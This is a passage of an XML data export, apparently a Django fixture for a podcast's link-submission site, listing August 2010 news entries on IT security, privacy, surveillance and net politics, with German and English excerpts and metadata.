besser...
Vulnerability disclosures reached record levels in the first half of 2010,according to the latest report from IBMs X-Force security team.
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Es wird nicht besser...
Vulnerability disclosures reached record levels in the first half of 2010,according to the latest report from IBMs X-Force security team.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.v3.co.uk/v3/news/2268714/ibm-force-reports-2010-breaking</field><field type="FileField" name="page_screenshot">page_shots/2010/08/26/2010smashesvulnerabilityrecords-v3couk-fo.png</field><field type="SlugField" name="slug">2010smashesvulnerabilityrecords-v3couk-fo</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-26 11:14:51</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">vulnerability</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="433" model="submitter.newsentry"><field type="CharField" name="title">Bad flash drive caused worst U.S. military breach | InSecurity Complex - CNET News</field><field type="TextField" name="excerpt">USB-Sticks sind die Bootsektorviren der heutigen Zeit.
A malware-laden flash drive inserted in a laptop at a U.S. military base in the Middle East in 2008 led to the "most significant breach of" the nation's military computers ever, according to a new magazine article by a top defense official.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;USB-Sticks sind die Bootsektorviren der heutigen Zeit.
A malware-laden flash drive inserted in a laptop at a U.S. military base in the Middle East in 2008 led to the "most significant breach of" the nation's military computers ever, according to a new magazine article by a top defense official.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://news.cnet.com/8301-27080_3-20014732-245.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/26/badflashdrivecausedworstusmilitarybreach.png</field><field type="SlugField" name="slug">badflashdrivecausedworstusmilitarybreach</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-26 11:13:25</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">memorystick vulnerability</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="9"></object></field></object><object pk="432" model="submitter.newsentry"><field type="CharField" name="title">Pirate Bay has stolen 46x the amount of USD that exist</field><field type="TextField" name="excerpt">According to the RIAA the Pirate Bay has stolen 46 the amount of USD that exist.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;According to the RIAA the Pirate Bay has stolen 46 the amount of USD that exist.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://cache.gawker.com/assets/images/comment/4/2010/07/87a2852446ae55d1f15656d49f913e94/original.jpg</field><field type="FileField" name="page_screenshot">page_shots/2010/08/25/piratebayhasstolen46xtheamountofusdthate.png</field><field type="SlugField" name="slug">piratebayhasstolen46xtheamountofusdthate</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-25 17:55:06</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">contentmafia piratebay riaa</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="431" model="submitter.newsentry"><field type="CharField" name="title"> USA setzen mobile Nacktscanner auf der Straße ein : netzpolitik.org</field><field type="TextField" name="excerpt">mobile röntgenscanner in den usa und .de</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;mobile röntgenscanner in den usa und .de
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/usa-setzen-mobile-nacktscanner-auf-der-strase-ein/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/25/usasetzenmobilenacktscanneraufderstraeei.png</field><field type="SlugField" name="slug">usasetzenmobilenacktscanneraufderstraeei</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-25 16:45:01</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">nacktscanner</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="430" model="submitter.newsentry"><field type="CharField" name="title">Streetview and the Church: The world belongs to God, not Google.</field><field type="TextField" name="excerpt"> A council member of the same southwest German church summarized the theological motivation for resisting Street View: “The world belongs to God, not Google.”
[Glaube Aktuell](http://www.glaubeaktuell.net/portal/nachrichten/nachricht.php?IDD=1281955643&amp;IDDParent=1067270799) m(</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt; A council member of the same southwest German church summarized the theological motivation for resisting Street View: “The world belongs to God, not Google.”
&lt;a href="http://www.glaubeaktuell.net/portal/nachrichten/nachricht.php?IDD=1281955643&amp;amp;IDDParent=1067270799"&gt;Glaube Aktuell&lt;/a&gt; m(
&lt;/p&gt;</field><field type="CharField" name="external_url">http://blogs.ssrc.org/tif/2010/08/19/google-god-and-the-public/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/25/streetviewandthechurchtheworldbelongstogo.png</field><field type="SlugField" name="slug">streetviewandthechurchtheworldbelongstogo</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-25 13:31:18</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">church streetview</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="429" model="submitter.newsentry"><field type="CharField" name="title">Cat-trashing lady outed by internet in less than 24 hours - Boing Boing</field><field type="TextField" name="excerpt">Yesterday, Mark posted a disturbing video of a middle-aged woman petting a cat and then throwing it—alive—into a trash bin. Mark today posted an update that she's now under police protection. What hasn't been talked about yet on Boing Boing is what happened between those two posts. 4chan happened.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Yesterday, Mark posted a disturbing video of a middle-aged woman petting a cat and then throwing it—alive—into a trash bin. Mark today posted an update that she's now under police protection. What hasn't been talked about yet on Boing Boing is what happened between those two posts. 4chan happened.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.boingboing.net/2010/08/24/internet-finds-cat-t.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/25/cat-trashingladyoutedbyinternetinlessthan2.png</field><field type="SlugField" name="slug">cat-trashingladyoutedbyinternetinlessthan2</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-25 13:23:06</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">4chan</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="428" model="submitter.newsentry"><field type="CharField" name="title">Full-Body Scan Technology Deployed In Street-Roving Vans</field><field type="TextField" name="excerpt">As the privacy controversy around full-body security scans begins to simmer, its worth noting that courthouses and airport security checkpoints arent the only places where backscatter x-ray vision is being deployed. The same technology, capable of seeing through clothes and walls, has also been rolling out on U.S. streets. American Science &amp; Engineering, a company based in Billerica, Massachusetts, has sold U.S. and foreign government agencies more than 500 backscatter x-ray scanners mounted in vans that can be driven past neighboring vehicles to see their contents, Joe Reiss, a vice president of marketing at the company told me in an interview.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;As the privacy controversy around full-body security scans begins to simmer, its worth noting that courthouses and airport security checkpoints arent the only places where backscatter x-ray vision is being deployed. The same technology, capable of seeing through clothes and walls, has also been rolling out on U.S. streets. American Science &amp;amp; Engineering, a company based in Billerica, Massachusetts, has sold U.S. and foreign government agencies more than 500 backscatter x-ray scanners mounted in vans that can be driven past neighboring vehicles to see their contents, Joe Reiss, a vice president of marketing at the company told me in an interview.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://blogs.forbes.com/andygreenberg/2010/08/24/full-body-scan-technology-deployed-in-street-roving-vans/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/25/full-bodyscantechnologydeployedinstreet-rovin.png</field><field type="SlugField" name="slug">full-bodyscantechnologydeployedinstreet-rovin</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-25 11:56:07</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">bürgerrechte, law enforcement, nacktscanner, police, polizeistaat, privacy</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="427" model="submitter.newsentry"><field type="CharField" name="title"> Die beste Verschlüsselung für eine Nachricht&amp;#8230; : netzpolitik.org</field><field type="TextField" name="excerpt">Von russischen Spionen lernen. Steganographie in soz. Netzwerken im großen Stil um Zensur zu umgehen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Von russischen Spionen lernen. Steganographie in soz. Netzwerken im großen Stil um Zensur zu umgehen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/die-beste-verschlusselung-fur-eine-nachricht/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/25/diebesteverschlusselungfureinenachricht82.png</field><field type="SlugField" name="slug">diebesteverschlusselungfureinenachricht82</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-25 09:59:53</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">censorship privacy steganography</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="426" model="submitter.newsentry"><field type="CharField" name="title">Steve Jobs Is Watching You: Apple Seeking to Patent Spyware | Electronic Frontier Foundation</field><field type="TextField" name="excerpt">It looks like Apple, Inc., is exploring a new business opportunity: spyware and what we're calling "traitorware." While users were celebrating the new jailbreaking and unlocking exemptions, Apple was quietly preparing to apply for a patent on technology that, among other things, would allow Apple to identify and punish users who take advantage of those exemptions or otherwise tinker with their devices. This patent application does nothing short of providing a roadmap for how Apple can — and presumably will — spy on its customers and control the way its customers use Apple products. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;It looks like Apple, Inc., is exploring a new business opportunity: spyware and what we're calling "traitorware." While users were celebrating the new jailbreaking and unlocking exemptions, Apple was quietly preparing to apply for a patent on technology that, among other things, would allow Apple to identify and punish users who take advantage of those exemptions or otherwise tinker with their devices. This patent application does nothing short of providing a roadmap for how Apple can — and presumably will — spy on its customers and control the way its customers use Apple products.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.eff.org/deeplinks/2010/08/steve-jobs-watching-you-apple-seeking-patent-0</field><field type="FileField" name="page_screenshot">page_shots/2010/08/25/stevejobsiswatchingyouappleseekingtopaten.png</field><field type="SlugField" name="slug">stevejobsiswatchingyouappleseekingtopaten</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-25 09:57:04</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">apple spyware</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="425" model="submitter.newsentry"><field type="CharField" name="title">Elektronischer Personalausweis: CCC findet Schwachstelle in Leseger&amp;auml;t - Golem.de</field><field type="TextField" name="excerpt">Der Chaos Computer Club will eine Schwachstelle an den Basisleseräten für den neuen elektronischen Personalausweis gefunden haben. Das hätten gemeinsam mit dem ARD-Magazin Plusminus durchgeführte Tests ergeben. Danach soll es möglich sein, die geheime PIN und andere Daten abzufangen. Das Lesegerät erlaubt es, sich mit dem Personalausweis am heimischen Computer für Onlinegeschäfte zu identifizieren. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Der Chaos Computer Club will eine Schwachstelle an den Basisleseräten für den neuen elektronischen Personalausweis gefunden haben. Das hätten gemeinsam mit dem ARD-Magazin Plusminus durchgeführte Tests ergeben. Danach soll es möglich sein, die geheime PIN und andere Daten abzufangen. Das Lesegerät erlaubt es, sich mit dem Personalausweis am heimischen Computer für Onlinegeschäfte zu identifizieren.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.golem.de/1008/77429.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/24/elektronischerpersonalausweiscccfindetschwach.png</field><field type="SlugField" name="slug">elektronischerpersonalausweiscccfindetschwach</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-24 10:07:48</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">ccc eperso hack</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object><object pk="7"></object><object pk="9"></object></field></object><object pk="424" model="submitter.newsentry"><field type="CharField" name="title">Yemeni assassin hits York man with spam death threat • The Register</field><field type="TextField" name="excerpt">Read your SPAM ...</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Read your SPAM ...
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/08/23/spam_threat/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/23/yemeniassassinhitsyorkmanwithspamdeaththre.png</field><field type="SlugField" name="slug">yemeniassassinhitsyorkmanwithspamdeaththre</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-23 18:37:56</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">assasin spam</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="423" model="submitter.newsentry"><field type="CharField" name="title"> 15 Facts About Net Neutrality [Infographic] </field><field type="TextField" name="excerpt">Zum Sendungsthema.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Zum Sendungsthema.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.readwriteweb.com/archives/15_facts_about_net_neutrality_infographic.php</field><field type="FileField" name="page_screenshot">page_shots/2010/08/23/15factsaboutnetneutralityinfographic.png</field><field type="SlugField" name="slug">15factsaboutnetneutralityinfographic</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-23 12:21:49</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">netneutrality</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="422" model="submitter.newsentry"><field type="CharField" name="title">heise online - Die Menschheit auf eine neue Stufe bringen: zum 60. Geburtstag von Steve Wozniak</field><field type="TextField" name="excerpt">Viel interessanter der Typ, als der andere Apple.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Viel interessanter der Typ, als der andere Apple.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Die-Menschheit-auf-eine-neue-Stufe-bringen-zum-60-Geburtstag-von-Steve-Wozniak-1053704.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/23/heiseonline-diemenschheitaufeineneuestufe.png</field><field type="SlugField" name="slug">heiseonline-diemenschheitaufeineneuestufe</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-23 12:20:15</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">anniversary woz</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="6"></object></field></object><object pk="421" model="submitter.newsentry"><field type="CharField" name="title">GVLN Rao Blog &amp;raquo; Blog Archive &amp;raquo; The &amp;#8220;Ugly face&amp;#8221; of the ECI: Arrest of Hari Prasad for “sting demonstration” </field><field type="TextField" name="excerpt">Indischer Wahlcomputerhacker für Demo verhaftet. Echt noch ein weiter Weg ins Informationszeitalter. Die Helden werden verhaftet.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Indischer Wahlcomputerhacker für Demo verhaftet. Echt noch ein weiter Weg ins Informationszeitalter. Die Helden werden verhaftet.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.indianevm.com/blogs/?p=402</field><field type="FileField" name="page_screenshot">page_shots/2010/08/22/gvlnraoblograquoblogarchiveraquothe.png</field><field type="SlugField" name="slug">gvlnraoblograquoblogarchiveraquothe</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-22 08:53:14</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">arrest, india, voting system</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object><object pk="9"></object></field></object><object pk="420" model="submitter.newsentry"><field type="CharField" name="title">20 Minuten Online - So ärgert man Neonazis - Ausland</field><field type="TextField" name="excerpt">s/Mannheimer Strasse/Geschwister-Scholl-Strasse/ in Riesa. Dort sitzt der NPD-Verlag Deutsche Stimme seit zehn Jahren seinen Sitz. Zudem sind mehrere Kader der Rechtsextremisten unter der Adresse erreichbar. Das auf Initiative einer CDU-Bürgermeisterin.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;s/Mannheimer Strasse/Geschwister-Scholl-Strasse/ in Riesa. Dort sitzt der NPD-Verlag Deutsche Stimme seit zehn Jahren seinen Sitz. Zudem sind mehrere Kader der Rechtsextremisten unter der Adresse erreichbar. Das auf Initiative einer CDU-Bürgermeisterin.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.20min.ch/news/ausland/story/So-aergert-man-Neonazis-17290254</field><field type="FileField" name="page_screenshot">page_shots/2010/08/21/20minutenonline-soargertmanneonazis-ausla_.png</field><field type="SlugField" name="slug">20minutenonline-soargertmanneonazis-ausla</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-21 14:50:07</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">cdu nazis</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="419" model="submitter.newsentry"><field type="CharField" name="title">Report: Trojan a factor in fatal Spanair crash? | Security - CNET News</field><field type="TextField" name="excerpt">The Spanair plane crash that killed 154 people two years ago Friday may have been partly caused by malware, according to reports.
El Pais, Spain's top newspaper, reported Friday that Spanair's mainframe was contaminated with Trojans at the time that Flight JK 5022 to Gran Canaria crashed just after take-off at Madrid's Barajas airport.
The mainframe was supposed to raise the alarm when three similar technical problems were noted, but did not do so due to the infestation, El Pais said.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The Spanair plane crash that killed 154 people two years ago Friday may have been partly caused by malware, according to reports.
El Pais, Spain's top newspaper, reported Friday that Spanair's mainframe was contaminated with Trojans at the time that Flight JK 5022 to Gran Canaria crashed just after take-off at Madrid's Barajas airport.
The mainframe was supposed to raise the alarm when three similar technical problems were noted, but did not do so due to the infestation, El Pais said.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://news.cnet.com/8301-1009_3-20014237-83.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/21/reporttrojanafactorinfatalspanaircrash.png</field><field type="SlugField" name="slug">reporttrojanafactorinfatalspanaircrash</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-21 13:15:19</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">trojan</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="9"></object></field></object><object pk="418" model="submitter.newsentry"><field type="CharField" name="title">Blocked Street View Images in Germany May Get Published - NYTimes.com</field><field type="TextField" name="excerpt">You can't escape Streetview.
But Best, a 37-year-old IT consultant who lives in Berlin, has recruited a 400-strong crew of volunteers who plan to take photographs of the areas that Google will excise from Street View. They plan to post those photos within Street View, which accepts user-generated photos.
"I'm accepting that some people are going to hate me," Best said during an interview on Friday. "I can live with that."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;You can't escape Streetview.
&lt;/p&gt;
&lt;p&gt;But Best, a 37-year-old IT consultant who lives in Berlin, has recruited a 400-strong crew of volunteers who plan to take photographs of the areas that Google will excise from Street View. They plan to post those photos within Street View, which accepts user-generated photos.
&lt;/p&gt;
&lt;p&gt;"I'm accepting that some people are going to hate me," Best said during an interview on Friday. "I can live with that."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.nytimes.com/external/idg/2010/08/20/20idg-blocked-street-view-images-in-germany-may-get-publis-54923.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/21/blockedstreetviewimagesingermanymaygetpubl.png</field><field type="SlugField" name="slug">blockedstreetviewimagesingermanymaygetpubl</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-21 00:43:56</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">google photo streetview</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="417" model="submitter.newsentry"><field type="CharField" name="title">HD Moore: Critical bug in 40 different Windows apps | ZDNet </field><field type="TextField" name="excerpt">Windows Shell und 39 weitere Win-Programme erlauben remote Exploitation, so HD Moore. Open my shared folder and I 0wn you :)
[Register](http://www.theregister.co.uk/2010/08/24/binary_planting_attack_advisory/) has the confirmation by MS</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Windows Shell und 39 weitere Win-Programme erlauben remote Exploitation, so HD Moore. Open my shared folder and I 0wn you :)
&lt;a href="http://www.theregister.co.uk/2010/08/24/binary_planting_attack_advisory/"&gt;Register&lt;/a&gt; has the confirmation by MS
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.zdnet.com/blog/security/hd-moore-critical-bug-in-40-different-windows-apps/7188</field><field type="FileField" name="page_screenshot">page_shots/2010/08/24/no_page_shot.png</field><field type="SlugField" name="slug">hdmoorecriticalbugin40differentwindowsapp</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-20 21:36:33</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">microsoft vulnerability windows</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="416" model="submitter.newsentry"><field type="CharField" name="title">USB Dongle Claims to Deliver First Easy Hack for PS3 | Gadget Lab | Wired.com</field><field type="TextField" name="excerpt">Looks like the PS3 is hacked via a USB dongle. One can "back up" games. No more than a Youtube video exists.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Looks like the PS3 is hacked via a USB dongle. One can "back up" games. No more than a Youtube video exists.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.wired.com/gadgetlab/2010/08/ps3-dongle/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/20/usbdongleclaimstodeliverfirsteasyhackforp.png</field><field type="SlugField" name="slug">usbdongleclaimstodeliverfirsteasyhackforp</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-20 21:28:28</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">hack ps3 sony</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="415" model="submitter.newsentry"><field type="CharField" name="title">Apple may be looking to lock out unauthorized iOS users</field><field type="TextField" name="excerpt">Apple patentiert Biometrie.
Apple has applied for a patent on a method to differentiate between authorized and unauthorized users of a particular iOS device. Once an unauthorized user is detected, the device can then automatically disable certain features or send notifications to Twitter or other services.
The patent, titled "Systems and Methods for Identifying Unauthorized Users of an Electronic Device," describes several ways a device could sense who is using an iPhone or iPad. Among the methods considered are voice print analysis, photo analysis, heartbeat analysis (!), hacking attempts, or even "noting particular activities that can indicate suspicious behavior."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Apple patentiert Biometrie.
&lt;/p&gt;
&lt;p&gt;Apple has applied for a patent on a method to differentiate between authorized and unauthorized users of a particular iOS device. Once an unauthorized user is detected, the device can then automatically disable certain features or send notifications to Twitter or other services.
&lt;/p&gt;
&lt;p&gt;The patent, titled "Systems and Methods for Identifying Unauthorized Users of an Electronic Device," describes several ways a device could sense who is using an iPhone or iPad. Among the methods considered are voice print analysis, photo analysis, heartbeat analysis (!), hacking attempts, or even "noting particular activities that can indicate suspicious behavior."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/apple/news/2010/08/apple-considering-identification-of-unauthorized-ios-users.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/08/20/applemaybelookingtolockoutunauthorizedios.png</field><field type="SlugField" name="slug">applemaybelookingtolockoutunauthorizedios</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-20 21:14:45</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">apple biometrie</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="414" model="submitter.newsentry"><field type="CharField" name="title">Datenleck bei Versicherung: Tausende Kundendaten im Netz</field><field type="TextField" name="excerpt">Auf einem Server der Versicherung Alte Leipziger standen bis zum Donnerstagnachmittag rund 3600 Versicherungsanträge in einem Unterverzeichnis ungeschützt zum Download bereit. Die Anträge wurden über den Tarifrechner der Sparte Rechtsschutz-Union aufgenommen und enthielten vertrauliche Daten wie etwa Bankverbindung, Beruf, Fahrzeuge, eventuelle Vorschäden sowie den bisherigen Versicherer des Antragsstellers. Auch Geburtsdatum, Nationalität, Familienstand und Angaben zu den Kindern fanden sich in den Anträgen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Auf einem Server der Versicherung Alte Leipziger standen bis zum Donnerstagnachmittag rund 3600 Versicherungsanträge in einem Unterverzeichnis ungeschützt zum Download bereit. Die Anträge wurden über den Tarifrechner der Sparte Rechtsschutz-Union aufgenommen und enthielten vertrauliche Daten wie etwa Bankverbindung, Beruf, Fahrzeuge, eventuelle Vorschäden sowie den bisherigen Versicherer des Antragsstellers. Auch Geburtsdatum, Nationalität, Familienstand und Angaben zu den Kindern fanden sich in den Anträgen.
